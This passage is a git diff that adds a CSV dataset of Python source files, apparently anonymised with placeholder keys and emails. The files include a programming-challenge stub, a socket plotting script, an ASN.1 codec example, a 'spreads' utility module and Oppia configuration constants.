diff --git "a/entity_list.csv" "b/entity_list.csv" --- "a/entity_list.csv" +++ "b/entity_list.csv" @@ -1,2 +1,43989 @@ -,content,length,detected elements -0,"['""""""\n[2014-11-26] Challenge #190 [Intermediate] Words inside of words\n\nhttps://www.reddit.PI:KEY\n\n#Description\nThis weeks challenge is a short yet interesting one that should hopefully help you exercise elegant solutions to a\nproblem rather than bruteforcing a challenge.\n#Challenge\nGiven the wordlist [enable1.txt](http://www.joereynoldsaudio.com/enable1.txt), you must find the word in that file\nwhich also contains the greatest number of words within that word.\nFor example, the word \'grayson\' has the following words in it\nGrayson\nGray\nGrays\nRay\nRays\nSon\nOn\nHere\'s another example, the word \'reports\' has the following\nreports\nreport\nport\nports\nrep\nYou\'re tasked with finding the word in that file that contains the most words.\nNOTE : If you have a different wordlist you would like to use, you\'re free to do so.\n#Restrictions\n* To keep output slightly shorter, a word will only be considered a word if it is 2 or more letters in length\n* The word you are using may not be permuted to get a different set of words (You can\'t change \'report\' to \'repotr\' so\nthat you can add more words to your list)\n#Finally\nHave a good challenge idea?\nConsider submitting it to /r/dailyprogrammer_ideas\n""""""\n\n\ndef main():\n pass\n\n\nif __name__ == ""__main__"":\n main()\n', ""from mpl_toolkits.mplot3d import axes3d\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.animation import FuncAnimation\nfrom socket import *\nimport time\n\n# Объявляем все глобальные переменные\n\nHOST = '127.0.0.1'\nPORT = 21566\nBUFSIZ = 512\nADDR = (HOST, PORT)\n\nbad_packet = 0\ngood_packet = 0\n# fig, ax = plt.subplots()\n\nfig = plt.figure()\nax = fig.add_subplot(111, projection='3d')\n\n# Socket\n# tcpCliSock = socket(AF_INET, SOCK_STREAM)\n# tcpCliSock.connect(ADDR)\n# Запрет на ожидание\nplt.ion()\n\ntstart = time.time()\n# real-time plotting loop\n\nX, Y, Z = [], [], []\n\nwhile True:\n try:\n # читаем данные из сети\n tcpCliSock.c\n data = tcpCliSock.recv(BUFSIZ)\n if data:\n print(len(X), data)\n data = data.decode().split(',')\n if len(data) == 9:\n # print('Data received', data)\n # tcpCliSock.send(b'Ok')\n\n good_packet += 1\n else:\n bad_packet += 1\n\n # читаем данные из сети\n data = tcpCliSock.recv(BUFSIZ)\n X.append(data[0])\n Y.append(data[1])\n Z.append(data[2])\n\n frame = ax.scatter(X, Y, Z, c='b', marker='o')\n\n # Remove old line collection before drawing\n #if oldcol is not None:\n # ax.collections.remove(oldcol)\n\n plt.pause(0.001 / len(X))\n\n\n except KeyboardInterrupt:\n tcpCliSock.close()\n print('FPS: %f' % (len(X) / (time.time() - tstart)))\n break\n"", '#!/usr/bin/env python\n\n""""""Encoding and decoding of a question once for each codec.\n\nExample execution:\n\n$ ./question.py\nASN.1 specification:\n\n-- A simple protocol taken from Wikipedia.\n\nFoo DEFINITIONS ::= BEGIN\n\n Question ::= SEQUENCE {\n id INTEGER,\n question IA5String\n }\n\n Answer ::= SEQUENCE {\n id INTEGER,\n answer BOOLEAN\n }\n\nEND\n\nQuestion to encode: {\'id\': 1, \'question\': \'Is 1+1=3?\'}\n\nBER:\nEncoded: 300e0201011609497320312b313d333f (16 bytes)\nDecoded: {\'id\': 1, \'question\': \'Is 1+1=3?\'}\n\nDER:\nEncoded: 300e0201011609497320312b313d333f (16 bytes)\nDecoded: {\'id\': 1, \'question\': \'Is 1+1=3?\'}\n\nJER:\nEncoded: PI:KEY (31 bytes)\nDecoded: {\'id\': 1, \'question\': \'Is 
1+1=3?\'}\n\nOER:\nEncoded: 010109497320312b313d333f (12 bytes)\nDecoded: {\'id\': 1, \'question\': \'Is 1+1=3?\'}\n\nPER:\nEncoded: 010109497320312b313d333f (12 bytes)\nDecoded: {\'id\': 1, \'question\': \'Is 1+1=3?\'}\n\nUPER:\nEncoded: 01010993cd03156c5eb37e (11 bytes)\nDecoded: {\'id\': 1, \'question\': \'Is 1+1=3?\'}\n\nXER:\nEncoded: PI:KEY (61 bytes)\nDecoded: {\'id\': 1, \'question\': \'Is 1+1=3?\'}\n\nProtocol Buffers:\nEncoded: 08011209497320312b313d333f (13 bytes)\nDecoded:\nid: 1\nquestion: ""Is 1+1=3?""\n$\n\n""""""\n\nfrom __future__ import print_function\nimport os\nfrom binascii import hexlify\nimport asn1tools\nfrom foo_pb2 import Question\n\nSCRIPT_DIR = os.path.dirname(os.path.realpath(__file__))\nFOO_ASN_PATH = os.path.join(SCRIPT_DIR,\n \'..\',\n \'..\',\n \'..\',\n \'tests\',\n \'files\',\n \'foo.asn\')\n\n# Print the specification.\nprint(\'ASN.1 specification:\')\nprint()\n\nwith open(FOO_ASN_PATH) as fin:\n print(fin.read())\n\n# The question to encode.\nquestion = {\'id\': 1, \'question\': \'Is 1+1=3?\'}\n\nprint(""Question to encode:"", question)\n\n# Encode and decode the question once for each codec.\nfor codec in [\'ber\', \'der\', \'jer\', \'oer\', \'per\', \'uper\', \'xer\']:\n foo = asn1tools.compile_files(FOO_ASN_PATH, codec)\n encoded = foo.encode(\'Question\', question)\n decoded = foo.decode(\'Question\', encoded)\n\n print()\n print(\'{}:\'.format(codec.upper()))\n print(\'Encoded: {} ({} bytes)\'.format(hexlify(encoded).decode(\'ascii\'),\n len(encoded)))\n print(\'Decoded:\', decoded)\n\n\n# Also encode using protocol buffers.\nquestion = Question()\nquestion.id = 1\nquestion.question = \'Is 1+1=3?\'\n\nencoded = question.SerializeToString()\ndecoded = question\n\nprint()\nprint(\'Protocol Buffers:\')\nprint(\'Encoded: {} ({} bytes)\'.format(hexlify(encoded).decode(\'ascii\'),\n len(encoded)))\nprint(\'Decoded:\')\nprint(decoded)\n', '# -*- coding: utf-8 -*-\n\n# Copyright (C) 2014 Johannes Baiter dummy@email.com\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n\n""""""\nVarious utility functions and classes.\n""""""\n\nfrom __future__ import division, unicode_literals, print_function\n\nimport abc\nimport glob\nimport json\nimport logging\nimport os\nimport pkg_resources\nimport platform\nimport re\nimport subprocess\nfrom unicodedata import normalize\n\nimport blinker\nimport colorama\nimport psutil\nimport roman\nfrom colorama import Fore, Back, Style\nfrom spreads.vendor.pathlib import Path\n\n\nclass SpreadsException(Exception):\n """""" General exception """"""\n pass\n\n\nclass DeviceException(SpreadsException):\n """""" Raised when a device-related error occured. """"""\n pass\n\n\nclass MissingDependencyException(SpreadsException):\n """""" Raised when a dependency for a plugin is missing. """"""\n pass\n\n\ndef get_version():\n """""" Get installed version via pkg_resources. 
""""""\n return pkg_resources.require(\'spreads\')[0].version\n\n\ndef find_in_path(name):\n """""" Find executable in $PATH.\n\n :param name: name of the executable\n :type name: unicode\n :returns: Path to executable or None if not found\n :rtype: unicode or None\n\n """"""\n candidates = None\n if is_os(\'windows\'):\n import _winreg\n if name.startswith(\'scantailor\'):\n try:\n cmd = _winreg.QueryValue(\n _winreg.HKEY_CLASSES_ROOT,\n \'Scan Tailor Project\\\\shell\\\\open\\\\command\')\n bin_path = cmd.split(\'"" ""\')[0][1:]\n if name.endswith(\'-cli\'):\n bin_path = bin_path[:-4] + ""-cli.exe""\n return bin_path if os.path.exists(bin_path) else None\n except OSError:\n return None\n else:\n path_dirs = os.environ.get(\'PATH\').split(\';\')\n path_dirs.append(os.getcwd())\n path_exts = os.environ.get(\'PATHEXT\').split(\';\')\n candidates = (os.path.join(p, name + e)\n for p in path_dirs\n for e in path_exts)\n else:\n candidates = (os.path.join(p, name)\n for p in os.environ.get(\'PATH\').split(\':\'))\n return next((c for c in candidates if os.path.exists(c)), None)\n\n\ndef is_os(osname):\n """""" Check if the current operating system matches the expected.\n\n :param osname: Operating system name as returned by\n :py:func:`platform.system`\n :returns: Whether the OS matches or not\n :rtype: bool\n """"""\n return platform.system().lower() == osname\n\n\ndef check_futures_exceptions(futures):\n """""""" Go through passed :py:class:`concurrent.futures._base.Future` objects\n and re-raise the first Exception raised by any one of them.\n\n :param futures: Iterable that contains the futures to be checked\n :type futures: iterable with :py:class:`concurrent.futures._base.Future`\n instances\n """"""\n if any(x.exception() for x in futures):\n raise next(x for x in futures if x.exception()).exception()\n\n\ndef get_free_space(path):\n """""" Return free space on file-system underlying the passed path.\n\n :param path: Path on file-system the free space of which is desired.\n :type path; unicode\n :return: Free space in bytes.\n :rtype: int\n\n """"""\n return psutil.disk_usage(unicode(path)).free\n\n\ndef get_subprocess(cmdline, **kwargs):\n """""" Get a :py:class:`subprocess.Popen` instance.\n\n On Windows systems, the process will be ran in the background and won\'t\n open a cmd-window or appear in the taskbar.\n The function signature matches that of the :py:class:`subprocess.Popen`\n initialization method.\n """"""\n if subprocess.mswindows and \'startupinfo\' not in kwargs:\n su = subprocess.STARTUPINFO()\n su.dwFlags |= subprocess.STARTF_USESHOWWINDOW\n su.wShowWindow = subprocess.SW_HIDE\n kwargs[\'startupinfo\'] = su\n return subprocess.Popen(cmdline, **kwargs)\n\n\ndef wildcardify(pathnames):\n """""" Try to generate a single path with wildcards that matches all\n `pathnames`.\n\n :param pathnames: List of pathnames to find a wildcard string for\n :type pathanmes: List of str/unicode\n :return: The wildcard string or None if none was found\n :rtype: unicode or None\n """"""\n wildcard_str = """"\n for idx, char in enumerate(pathnames[0]):\n if all(p[idx] == char for p in pathnames[1:]):\n wildcard_str += char\n elif not wildcard_str or wildcard_str[-1] != ""*"":\n wildcard_str += ""*""\n matched_paths = glob.glob(wildcard_str)\n if not sorted(pathnames) == sorted(matched_paths):\n return None\n return wildcard_str\n\n\ndef diff_dicts(old, new):\n """""" Get the difference between two dictionaries.\n\n :param old: Dictionary to base comparison on\n :type old: dict\n :param new: 
Dictionary to compare with\n :type new: dict\n :return: A (possibly nested) dictionary containing all items from `new`\n that differ from the ones in `old`\n :rtype: dict\n """"""\n out = {}\n for key, value in old.iteritems():\n if new[key] != value:\n out[key] = new[key]\n elif isinstance(value, dict):\n diff = diff_dicts(value, new[key])\n if diff:\n out[key] = diff\n return out\n\n\ndef slugify(text, delimiter=u\'-\'):\n """"""Generates an ASCII-only slug.\n\n Code adapted from Flask snipped by Armin Ronacher:\n http://flask.pocoo.org/snippets/5/\n\n :param text: Text to create slug for\n :type text: unicode\n :param delimiter: Delimiter to use in slug\n :type delimiter: unicode\n :return: The generated slug\n :rtype: unicode\n """"""\n punctuation_re = r\'[\\t !""#$%&\\\'()*\\-/<=>?@\\[\\\\\\]^_`{|},.]+\'\n result = []\n for word in re.split(punctuation_re, text.lower()):\n word = normalize(\'NFKD\', word).encode(\'ascii\', \'ignore\')\n if word:\n result.append(word)\n return unicode(delimiter.join(result))\n\n\nclass _instancemethodwrapper(object): # noqa\n def __init__(self, callable):\n self.callable = callable\n self.__dontcall__ = False\n\n def __getattr__(self, key):\n return getattr(self.callable, key)\n\n def __call__(self, *args, **kwargs):\n if self.__dontcall__:\n raise TypeError(\'Attempted to call abstract method.\')\n return self.callable(*args, **kwargs)\n\n\nclass _classmethod(classmethod): # noqa\n def __init__(self, func):\n super(_classmethod, self).__init__(func)\n isabstractmethod = getattr(func, \'__isabstractmethod__\', False)\n if isabstractmethod:\n self.__isabstractmethod__ = isabstractmethod\n\n def __get__(self, instance, owner):\n result = _instancemethodwrapper(super(_classmethod, self)\n .__get__(instance, owner))\n isabstractmethod = getattr(self, \'__isabstractmethod__\', False)\n if isabstractmethod:\n result.__isabstractmethod__ = isabstractmethod\n abstractmethods = getattr(owner, \'__abstractmethods__\', None)\n if abstractmethods and result.__name__ in abstractmethods:\n result.__dontcall__ = True\n return result\n\n\nclass abstractclassmethod(_classmethod): # noqa\n """""" New decorator class that implements the @abstractclassmethod decorator\n added in Python 3.3 for Python 2.7.\n\n Kudos to http://stackoverflow.com/a/13640018/487903\n """"""\n def __init__(self, func):\n func = abc.abstractmethod(func)\n super(abstractclassmethod, self).__init__(func)\n\n\nclass ColourStreamHandler(logging.StreamHandler):\n """""" A colorized output StreamHandler\n\n Kudos to Leigh MacDonald: http://goo.gl/Lpr6C5\n """"""\n\n # Some basic colour scheme defaults\n colours = {\n \'DEBUG\': Fore.CYAN,\n \'INFO\': Fore.GREEN,\n \'WARN\': Fore.YELLOW,\n \'WARNING\': Fore.YELLOW,\n \'ERROR\': Fore.RED,\n \'CRIT\': Back.RED + Fore.WHITE,\n \'CRITICAL\': Back.RED + Fore.WHITE\n }\n\n @property\n def is_tty(self):\n """""" Check if we are using a ""real"" TTY. 
If we are not using a TTY it\n means that the colour output should be disabled.\n\n :return: Using a TTY status\n :rtype: bool\n """"""\n try:\n return getattr(self.stream, \'isatty\', None)()\n except:\n return False\n\n def emit(self, record):\n try:\n message = self.format(record)\n if not self.is_tty:\n self.stream.write(message)\n else:\n self.stream.write(self.colours[record.levelname] +\n message + Style.RESET_ALL)\n self.stream.write(getattr(self, \'terminator\', \'\\n\'))\n self.flush()\n except (KeyboardInterrupt, SystemExit):\n raise\n except:\n self.handleError(record)\n\n\nclass EventHandler(logging.Handler):\n """""" Subclass of :py:class:`logging.Handler` that emits a\n :py:class:`blinker.base.Signal` whenever a new record is emitted.\n """"""\n signals = blinker.Namespace()\n on_log_emit = signals.signal(\'logrecord\', doc=""""""\\\n Sent when a log record was emitted.\n\n :keyword :class:`logging.LogRecord` record: the LogRecord\n """""")\n\n def emit(self, record):\n self.on_log_emit.send(record=record)\n\n\ndef get_data_dir(create=False):\n """""" Return (and optionally create) the user\'s default data directory.\n\n :param create: Create the data directory if it doesn\'t exist\n :type create: bool\n :return: Path to the default data directory\n :rtype: unicode\n """"""\n unix_dir_var = \'XDG_DATA_HOME\'\n unix_dir_fallback = \'~/.config\'\n windows_dir_var = \'APPDATA\'\n windows_dir_fallback = \'~\\\\AppData\\\\Roaming\'\n mac_dir = \'~/Library/Application Support\'\n base_dir = None\n if is_os(\'darwin\'):\n if Path(unix_dir_fallback).exists:\n base_dir = unix_dir_fallback\n else:\n base_dir = mac_dir\n elif is_os(\'windows\'):\n if windows_dir_var in os.environ:\n base_dir = os.environ[windows_dir_var]\n else:\n base_dir = windows_dir_fallback\n else:\n if unix_dir_var in os.environ:\n base_dir = os.environ[unix_dir_var]\n else:\n base_dir = unix_dir_fallback\n app_path = Path(base_dir)/\'spreads\'\n if create and not app_path.exists():\n app_path.mkdir()\n return unicode(app_path)\n\n\ndef colorize(text, color):\n """""" Return text with a new ANSI foreground color.\n\n :param text: Text to be wrapped\n :param color: ANSI color to wrap text in\n :type color: str (from `colorama.ansi `)\n :return: Colorized text\n """"""\n return color + text + colorama.Fore.RESET\n\n\nclass RomanNumeral(object):\n """""" Number type that represents integers as Roman numerals and that\n can be used in all arithmetic operations applicable to integers.\n """"""\n @staticmethod\n def is_roman(value):\n """""" Check if `value` is a valid Roman numeral.\n\n :param value: Value to be checked\n :type value: unicode\n :returns: Whether the value is valid or not\n :rtype: bool\n """"""\n return bool(roman.romanNumeralPattern.match(value))\n\n def __init__(self, value, case=\'upper\'):\n """""" Create a new instance.\n\n :param value: Value of the instance\n :type value: int, unicode containing valid Roman numeral or\n :py:class:`RomanNumeral`\n """"""\n self._val = self._to_int(value)\n self._case = case\n if isinstance(value, basestring) and not self.is_roman(value):\n self._case = \'lower\'\n elif isinstance(value, RomanNumeral):\n self._case = value._case\n\n def _to_int(self, value):\n if isinstance(value, int):\n return value\n elif isinstance(value, basestring) and self.is_roman(value.upper()):\n return roman.fromRoman(value.upper())\n elif isinstance(value, RomanNumeral):\n return value._val\n else:\n raise ValueError(""Value must be a valid roman numeral, a string""\n "" representing 
one or an integer: \'{0}\'""\n .format(value))\n\n def __cmp__(self, other):\n if self._val > self._to_int(other):\n return 1\n elif self._val == self._to_int(other):\n return 0\n elif self._val < self._to_int(other):\n return -1\n\n def __add__(self, other):\n return RomanNumeral(self._val + self._to_int(other), self._case)\n\n def __sub__(self, other):\n return RomanNumeral(self._val - self._to_int(other), self._case)\n\n def __int__(self):\n return self._val\n\n def __str__(self):\n strval = roman.toRoman(self._val)\n if self._case == \'lower\':\n return strval.lower()\n else:\n return strval\n\n def __unicode__(self):\n return unicode(str(self))\n\n def __repr__(self):\n return str(self)\n\n\nclass CustomJSONEncoder(json.JSONEncoder):\n """""" Custom :py:class:`json.JSONEncoder`.\n\n Uses an object\'s `to_dict` method if present for serialization.\n\n Serializes :py:class:`pathlib.Path` instances to the string\n representation of their relative path to a BagIt-compliant directory or\n their absolute path if not applicable.\n """"""\n def default(self, obj):\n if hasattr(obj, \'to_dict\'):\n return obj.to_dict()\n if isinstance(obj, Path):\n # Serialize paths that belong to a workflow as paths relative to\n # its base directory\n base = next((p for p in obj.parents if (p/\'bagit.txt\').exists()),\n None)\n if base:\n return unicode(obj.relative_to(base))\n else:\n return unicode(obj.absolute())\n return json.JSONEncoder.default(self, obj)\n', '# coding: utf-8\n#\n# Copyright 2014 The Oppia Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the ""License"");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an ""AS-IS"" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n""""""Stores various configuration options and constants for Oppia.""""""\n\nimport copy\nimport datetime\nimport os\n\n\n# Whether to unconditionally log info messages.\nDEBUG = False\n\n# The platform for the storage backend. 
This is used in the model-switching\n# code in core/platform.\nPLATFORM = \'gae\'\n\n# This should be string comparison, since all environment variables\n# are converted to string\nIS_MINIFIED = os.environ.get(\'MINIFICATION\') == \'True\'\n\n# Whether we should serve the development or production experience.\n# DEV_MODE should only be changed to False in the production environment.\n# To use minified resources in the development environment,\n# change the MINIFICATION env variable in app.yaml to True.\n# When DEV_MODE is True, this indicates that we are not running in\n# the production App Engine environment, which affects things like\n# login/logout URLs,as well as third-party libraries\n# that App Engine normally provides.\nif PLATFORM == \'gae\':\n DEV_MODE = (\n not os.environ.get(\'SERVER_SOFTWARE\')\n or os.environ[\'SERVER_SOFTWARE\'].startswith(\'Development\'))\nelse:\n raise Exception(\'Invalid platform: expected one of [\\\'gae\\\']\')\n\nTESTS_DATA_DIR = os.path.join(\'core\', \'tests\', \'data\')\nSAMPLE_EXPLORATIONS_DIR = os.path.join(\'data\', \'explorations\')\nSAMPLE_COLLECTIONS_DIR = os.path.join(\'data\', \'collections\')\nINTERACTIONS_DIR = os.path.join(\'extensions\', \'interactions\')\nGADGETS_DIR = os.path.join(\'extensions\', \'gadgets\')\nRTE_EXTENSIONS_DIR = os.path.join(\'extensions\', \'rich_text_components\')\n\nOBJECT_TEMPLATES_DIR = os.path.join(\'extensions\', \'objects\', \'templates\')\n\n# Choose production template if minification flag is used or\n# if in production mode\nTEMPLATES_DIR_PREFIX = \'prod\' if (IS_MINIFIED or not DEV_MODE) else \'dev\'\nFRONTEND_TEMPLATES_DIR = os.path.join(\n \'core\', \'templates\', TEMPLATES_DIR_PREFIX, \'head\')\nDEPENDENCIES_TEMPLATES_DIR = os.path.join(\'extensions\', \'dependencies\')\nVALUE_GENERATORS_DIR = os.path.join(\'extensions\', \'value_generators\')\nOBJECT_DEFAULT_VALUES_FILE_PATH = os.path.join(\n \'extensions\', \'interactions\', \'object_defaults.json\')\nRULES_DESCRIPTIONS_FILE_PATH = os.path.join(\n os.getcwd(), \'extensions\', \'interactions\', \'rules.json\')\n\n# The maximum number of results to retrieve in a datastore query.\nDEFAULT_QUERY_LIMIT = 1000\n\n# The maximum number of results to retrieve in a datastore query\n# for top rated published explorations in /library page.\nNUMBER_OF_TOP_RATED_EXPLORATIONS_FOR_LIBRARY_PAGE = 8\n\n# The maximum number of results to retrieve in a datastore query\n# for recently published explorations in /library page.\nRECENTLY_PUBLISHED_QUERY_LIMIT_FOR_LIBRARY_PAGE = 8\n\n# The maximum number of results to retrieve in a datastore query\n# for top rated published explorations in /library/top_rated page.\nNUMBER_OF_TOP_RATED_EXPLORATIONS_FULL_PAGE = 20\n\n# The maximum number of results to retrieve in a datastore query\n# for recently published explorations in /library/recently_published page.\nRECENTLY_PUBLISHED_QUERY_LIMIT_FULL_PAGE = 20\n\n# The current version of the dashboard stats blob schema. If any backward-\n# incompatible changes are made to the stats blob schema in the data store,\n# this version number must be changed.\nCURRENT_DASHBOARD_STATS_SCHEMA_VERSION = 1\n\n# The current version of the exploration states blob schema. 
If any backward-\n# incompatible changes are made to the states blob schema in the data store,\n# this version number must be changed and the exploration migration job\n# executed.\nCURRENT_EXPLORATION_STATES_SCHEMA_VERSION = 7\n\n# The current version of the all collection blob schemas (such as the nodes\n# structure within the Collection domain object). If any backward-incompatible\n# changes are made to any of the blob schemas in the data store, this version\n# number must be changed.\nCURRENT_COLLECTION_SCHEMA_VERSION = 2\n\n# The default number of exploration tiles to load at a time in the search\n# results page.\nSEARCH_RESULTS_PAGE_SIZE = 20\n\n# The default number of commits to show on a page in the exploration history\n# tab.\nCOMMIT_LIST_PAGE_SIZE = 50\n\n# The default number of items to show on a page in the exploration feedback\n# tab.\nFEEDBACK_TAB_PAGE_SIZE = 20\n\n# Default title for a newly-minted exploration.\nDEFAULT_EXPLORATION_TITLE = \'\'\n# Default category for a newly-minted exploration.\nDEFAULT_EXPLORATION_CATEGORY = \'\'\n# Default objective for a newly-minted exploration.\nDEFAULT_EXPLORATION_OBJECTIVE = \'\'\n\n# Default name for the initial state of an exploration.\nDEFAULT_INIT_STATE_NAME = \'Introduction\'\n# The default content text for the initial state of an exploration.\nDEFAULT_INIT_STATE_CONTENT_STR = \'\'\n\n# Default title for a newly-minted collection.\nDEFAULT_COLLECTION_TITLE = \'\'\n# Default category for a newly-minted collection.\nDEFAULT_COLLECTION_CATEGORY = \'\'\n# Default objective for a newly-minted collection.\nDEFAULT_COLLECTION_OBJECTIVE = \'\'\n\n# A dict containing the accepted image formats (as determined by the imghdr\n# module) and the corresponding allowed extensions in the filenames of uploaded\n# files.\nACCEPTED_IMAGE_FORMATS_AND_EXTENSIONS = {\n \'jpeg\': [\'jpg\', \'jpeg\'],\n \'png\': [\'png\'],\n \'gif\': [\'gif\']\n}\n\n# A string containing the disallowed characters in state or exploration names.\n# The underscore is needed because spaces in names must be converted to\n# underscores when displayed as part of a URL or key. 
The other conventions\n# here are derived from the Wikipedia guidelines for naming articles.\nINVALID_NAME_CHARS = u\':#/|_%<>[]{}\\ufffd\\\\\' + chr(127)\nfor ind in range(32):\n INVALID_NAME_CHARS += chr(ind)\n# Prefix for data sent from the server to the client via JSON.\nXSSI_PREFIX = \')]}\\\'\\n\'\n# A regular expression for alphanumeric characters.\nALPHANUMERIC_REGEX = r\'^[A-Za-z0-9]+$\'\n# A regular expression for alphanumeric words separated by single spaces.\n# Ex.: \'valid name\', \'another valid name\', \'invalid name\'.\nALPHANUMERIC_SPACE_REGEX = r\'^[0-9A-Za-z]+(?:[ ]?[0-9A-Za-z]+)*$\'\n# A regular expression for tags.\nTAG_REGEX = r\'^[a-z ]+$\'\n\n# Invalid names for parameters used in expressions.\nAUTOMATICALLY_SET_PARAMETER_NAMES = [\'answer\', \'choices\']\nINVALID_PARAMETER_NAMES = AUTOMATICALLY_SET_PARAMETER_NAMES + [\n \'abs\', \'all\', \'and\', \'any\', \'else\', \'floor\', \'if\', \'log\', \'or\',\n \'pow\', \'round\', \'then\']\n\n# These are here rather than in rating_services.py to avoid import\n# circularities with exp_services.\n# TODO (Jacob) Refactor exp_services to remove this problem.\n_EMPTY_RATINGS = {\'1\': 0, \'2\': 0, \'3\': 0, \'4\': 0, \'5\': 0}\ndef get_empty_ratings():\n return copy.deepcopy(_EMPTY_RATINGS)\n\n# Empty scaled average rating as a float.\nEMPTY_SCALED_AVERAGE_RATING = 0.0\n\n# To use GAE email service.\nEMAIL_SERVICE_PROVIDER_GAE = \'gae_email_service\'\n# To use mailgun email service.\nEMAIL_SERVICE_PROVIDER_MAILGUN = \'mailgun_email_service\'\n# Use GAE email service by default.\nEMAIL_SERVICE_PROVIDER = EMAIL_SERVICE_PROVIDER_GAE\n# If the Mailgun email API is used, the ""None"" below should be replaced\n# with the Mailgun API key.\nMAILGUN_API_KEY = None\n# If the Mailgun email API is used, the ""None"" below should be replaced\n# with the Mailgun domain name (ending with mailgun.org).\nMAILGUN_DOMAIN_NAME = None\n# Committer id for system actions.\nSYSTEM_COMMITTER_ID = \'admin\'\nSYSTEM_EMAIL_ADDRESS = dummy@email.com\'\nADMIN_EMAIL_ADDRESS = dummy@email.com\'\nNOREPLY_EMAIL_ADDRESS = dummy@email.com\'\n# Ensure that SYSTEM_EMAIL_ADDRESS and ADMIN_EMAIL_ADDRESS are both valid and\n# correspond to owners of the app before setting this to True. If\n# SYSTEM_EMAIL_ADDRESS is not that of an app owner, email messages from this\n# address cannot be sent. 
If True then emails can be sent to any user.\nCAN_SEND_EMAILS = False\n# If you want to turn on this facility please check the email templates in the\n# send_role_notification_email() function in email_manager.py and modify them\n# accordingly.\nCAN_SEND_EDITOR_ROLE_EMAILS = False\n# If enabled then emails will be sent to creators for feedback messages.\nCAN_SEND_FEEDBACK_MESSAGE_EMAILS = False\n# Time to wait before sending feedback message emails (currently set to 1\n# hour).\nDEFAULT_FEEDBACK_MESSAGE_EMAIL_COUNTDOWN_SECS = 3600\n# Whether to send an email when new feedback message is received for\n# an exploration.\nDEFAULT_FEEDBACK_MESSAGE_EMAIL_PREFERENCE = True\n# Whether to send email updates to a user who has not specified a preference.\nDEFAULT_EMAIL_UPDATES_PREFERENCE = False\n# Whether to send an invitation email when the user is granted\n# new role permissions in an exploration.\nDEFAULT_EDITOR_ROLE_EMAIL_PREFERENCE = True\n# Whether to require an email to be sent, following a moderator action.\nREQUIRE_EMAIL_ON_MODERATOR_ACTION = False\n# Whether to allow custom event reporting to Google Analytics.\nCAN_SEND_ANALYTICS_EVENTS = False\n# Timespan in minutes before allowing duplicate emails.\nDUPLICATE_EMAIL_INTERVAL_MINS = 2\n# Number of digits after decimal to which the average ratings value in the\n# dashboard is rounded off to.\nAVERAGE_RATINGS_DASHBOARD_PRECISION = 2\n\nEMAIL_INTENT_SIGNUP = \'signup\'\nEMAIL_INTENT_DAILY_BATCH = \'daily_batch\'\nEMAIL_INTENT_EDITOR_ROLE_NOTIFICATION = \'editor_role_notification\'\nEMAIL_INTENT_FEEDBACK_MESSAGE_NOTIFICATION = \'feedback_message_notification\'\nEMAIL_INTENT_SUGGESTION_NOTIFICATION = \'suggestion_notification\'\nEMAIL_INTENT_REPORT_BAD_CONTENT = \'report_bad_content\'\nEMAIL_INTENT_MARKETING = \'marketing\'\nEMAIL_INTENT_PUBLICIZE_EXPLORATION = \'publicize_exploration\'\nEMAIL_INTENT_UNPUBLISH_EXPLORATION = \'unpublish_exploration\'\nEMAIL_INTENT_DELETE_EXPLORATION = \'delete_exploration\'\n\nMODERATOR_ACTION_PUBLICIZE_EXPLORATION = \'publicize_exploration\'\nMODERATOR_ACTION_UNPUBLISH_EXPLORATION = \'unpublish_exploration\'\nDEFAULT_SALUTATION_HTML_FN = (\n lambda recipient_username: \'Hi %s,\' % recipient_username)\nDEFAULT_SIGNOFF_HTML_FN = (\n lambda sender_username: (\n \'Thanks!
%s (Oppia moderator)\' % sender_username))\n\nVALID_MODERATOR_ACTIONS = {\n MODERATOR_ACTION_PUBLICIZE_EXPLORATION: {\n \'email_config\': \'publicize_exploration_email_html_body\',\n \'email_subject_fn\': (\n lambda exp_title: (\n \'Your Oppia exploration ""%s"" has been featured!\' % exp_title)),\n \'email_intent\': EMAIL_INTENT_PUBLICIZE_EXPLORATION,\n \'email_salutation_html_fn\': DEFAULT_SALUTATION_HTML_FN,\n \'email_signoff_html_fn\': DEFAULT_SIGNOFF_HTML_FN,\n },\n MODERATOR_ACTION_UNPUBLISH_EXPLORATION: {\n \'email_config\': \'unpublish_exploration_email_html_body\',\n \'email_subject_fn\': (\n lambda exp_title: (\n \'Your Oppia exploration ""%s"" has been unpublished\' % exp_title)\n ),\n \'email_intent\': \'unpublish_exploration\',\n \'email_salutation_html_fn\': DEFAULT_SALUTATION_HTML_FN,\n \'email_signoff_html_fn\': DEFAULT_SIGNOFF_HTML_FN,\n },\n}\n\n# Panel properties and other constants for the default skin.\nGADGET_PANEL_AXIS_HORIZONTAL = \'horizontal\'\nPANELS_PROPERTIES = {\n \'bottom\': {\n \'width\': 350,\n \'height\': 100,\n \'stackable_axis\': GADGET_PANEL_AXIS_HORIZONTAL,\n \'pixels_between_gadgets\': 80,\n \'max_gadgets\': 1\n }\n}\n\n# When the site terms were last updated, in UTC.\nREGISTRATION_PAGE_LAST_UPDATED_UTC = datetime.datetime(2015, 10, 14, 2, 40, 0)\n\n# Format of string for dashboard statistics logs.\n# NOTE TO DEVELOPERS: This format should not be changed, since it is used in\n# the existing storage models for UserStatsModel.\nDASHBOARD_STATS_DATETIME_STRING_FORMAT = \'%Y-%m-%d\'\n\n# The maximum size of an uploaded file, in bytes.\nMAX_FILE_SIZE_BYTES = 1048576\n\n# The default language code for an exploration.\nDEFAULT_LANGUAGE_CODE = \'en\'\n\n# The id of the default skin.\n# TODO(sll): Deprecate this; it is no longer used.\nDEFAULT_SKIN_ID = \'conversation_v1\'\n\n# The prefix for an \'accepted suggestion\' commit message.\nCOMMIT_MESSAGE_ACCEPTED_SUGGESTION_PREFIX = \'Accepted suggestion 